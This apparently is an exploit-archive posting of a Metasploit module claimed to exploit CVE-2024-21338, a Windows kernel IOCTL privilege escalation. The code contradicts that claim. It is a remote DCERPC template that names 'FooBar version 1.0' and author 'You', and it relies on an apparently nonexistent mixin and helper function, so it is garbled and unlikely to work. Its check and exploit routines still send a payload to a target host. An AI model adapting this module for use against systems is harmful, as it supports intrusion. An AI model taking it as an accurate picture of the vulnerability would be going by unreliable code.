Microsoft Windows version 10.0.17763.5458 kernel IOCTL privilege escalation exploit.
8707efbb61bde9a6bad7e9f41e2e2aa406ec325770b5e4cf2822308facf677cb
#############################################
# Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #
#
# This module requires Metasploit: https://metasploit.com/download
#
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# #
#############################################
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2024-21338 Exploit',
'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
'Author' => 'You',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-21338']
]
)
)
register_options(
[
OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
OptPort.new('RPORT', [true, 'The target port', 1234])
]
)
end
def check
connect
begin
impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
rescue Rex::Post::Meterpreter::RequestError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Appears
end
def exploit
connect
begin
impacket_artifact(
dcerpc_binding('ncacn_ip_tcp'),
'FooBar',
datastore['FooBarPayload']
)
rescue Rex::Post::Meterpreter::RequestError
fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
end
handler
disconnect
end
end
#refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338